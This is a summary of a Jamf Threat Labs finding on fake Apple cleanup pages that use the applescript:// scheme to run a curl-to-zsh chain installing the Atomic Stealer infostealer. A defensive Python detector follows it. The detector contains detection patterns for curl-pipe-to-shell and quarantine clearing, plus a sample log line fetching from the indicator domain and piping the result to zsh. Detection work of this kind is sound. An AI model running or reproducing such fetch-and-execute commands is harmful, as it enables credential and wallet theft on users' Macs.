Overview
- Jamf Threat Labs, which detailed the tactic Wednesday, reports fake Apple‑style cleanup pages now launch Script Editor from the browser to avoid the new Terminal paste warning.
- Clicking an on‑page “Execute” button invokes the applescript:// URL scheme, opens Script Editor with a pre‑filled script, and nudges the user to run it as a routine task.
- The script runs an obfuscated curl piped to zsh that decodes a payload, downloads a Mach‑O to /tmp, clears extended attributes with xattr -c, makes it executable, and starts it.
- Jamf identified the final binary as Atomic Stealer, an infostealer that targets Keychain items, browser wallets and autofill data, passwords, cookies, saved cards, and can add a backdoor for persistence.
- Security guidance urges users to treat browser requests to open Script Editor as high risk, rely on official Apple help, and block indicators shared by researchers such as dryvecar[.]com.
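A detection sketch for the chain summarized above, written as an added example rather than anything from Jamf's report: it scans process-start telemetry for a curl-pipe-to-shell command launched from Script Editor or osascript, for `xattr -c` run against a /tmp path, and for command lines that reference the published indicator dryvecar[.]com. The JSON event shape, field names (`parent_name`, `cmdline`, `pid`) and the sample events are constructed for the example; only the domain comes from the page.

```python
"""Flag the Script Editor -> curl | zsh -> xattr -c chain in process telemetry.

Added example, not Jamf Threat Labs code. Events are constructed JSON lines in
an assumed EDR-style shape: {"pid", "parent_name", "cmdline"}.
"""
from __future__ import annotations

import json
import re

# Indicator relayed on the page, stored defanged and refanged only for matching.
IOC_DOMAINS_DEFANGED = ["dryvecar[.]com"]


def refang(domain: str) -> str:
    return domain.replace("[.]", ".")


IOC_DOMAINS = [refang(d) for d in IOC_DOMAINS_DEFANGED]

# Processes that a browser-launched AppleScript would run commands through.
SCRIPT_HOSTS = {"Script Editor", "osascript"}

# curl output piped straight into a shell interpreter.
CURL_PIPE_SHELL = re.compile(r"\bcurl\b.*\|\s*(zsh|bash|sh)\b")
# xattr -c (clear all extended attributes, including quarantine) on a /tmp path.
XATTR_CLEAR_TMP = re.compile(r"\bxattr\s+-c\s+(/tmp/|/private/tmp/)\S*")


def classify(event: dict) -> list[str]:
    """Return the reasons an event matches the reported chain; [] if none."""
    reasons: list[str] = []
    parent = event.get("parent_name", "")
    cmd = event.get("cmdline", "")
    if parent in SCRIPT_HOSTS and CURL_PIPE_SHELL.search(cmd):
        reasons.append("curl piped to a shell, spawned from Script Editor/osascript")
    if XATTR_CLEAR_TMP.search(cmd):
        reasons.append("xattr -c on a /tmp file (quarantine attribute removal)")
    for domain in IOC_DOMAINS:
        if domain in cmd:
            reasons.append(f"command line references indicator {domain}")
    return reasons


def parse_events(text: str) -> list[dict]:
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def scan(events: list[dict]) -> list[dict]:
    """Return one alert per event that matched at least one heuristic."""
    alerts = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            alerts.append({"pid": ev.get("pid"), "cmdline": ev.get("cmdline"), "reasons": reasons})
    return alerts


# Constructed sample telemetry: two benign events, two that mirror the chain.
SAMPLE_LOG = """
{"pid": 101, "parent_name": "Finder", "cmdline": "/usr/bin/curl -sS https://example.com/readme.txt"}
{"pid": 202, "parent_name": "Script Editor", "cmdline": "/bin/zsh -c \\"curl -fsSL https://dryvecar.com/PLACEHOLDER | zsh\\""}
{"pid": 203, "parent_name": "zsh", "cmdline": "/usr/bin/xattr -c /tmp/.update"}
{"pid": 104, "parent_name": "Terminal", "cmdline": "/usr/bin/xattr -c /Users/me/Downloads/report.pdf"}
"""


def demo() -> list[dict]:
    return scan(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in demo():
        print(alert["pid"], alert["cmdline"])
        for r in alert["reasons"]:
            print("   -", r)
```

The /tmp restriction on the `xattr -c` rule is deliberate: clearing attributes on a user's own download is routine, while clearing them on a freshly dropped /tmp binary is the step the page describes. In production the parent-process check would come from the EDR's real process tree rather than a single name field.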